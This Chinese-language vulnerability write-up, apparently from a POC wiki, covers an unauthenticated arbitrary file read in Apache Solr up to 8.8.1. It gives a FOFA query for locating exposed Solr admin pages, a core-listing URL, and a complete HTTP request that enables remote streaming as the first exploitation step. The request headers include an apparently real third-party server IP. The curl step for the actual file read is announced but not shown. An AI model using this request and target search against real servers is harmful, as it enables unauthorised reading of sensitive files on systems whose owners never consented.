Apache Solr 任意文件读取漏洞

漏洞描述

Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件

漏洞影响

Apache Solr <= 8.8.1

FOFA

title="Solr Admin"

漏洞复现

访问 Solr Admin 管理员页面

获取core的信息

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

发送请求如下

POST /solr/ckan/config HTTP/1.1
Host: xxx.xxx.xxx:8983
Content-Length: 99
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://118.31.46.134:8983
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://118.31.46.134:8983/solr/ckan/config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}

再进行文件读取

Curl请求为

漏洞利用POC

POC还是建立在未授权访问的情况下

Goby & POC

已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中

Apache_Solr_Arbitrary_File_Read.json

参考文章

https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ

Last updated

Was this helpful?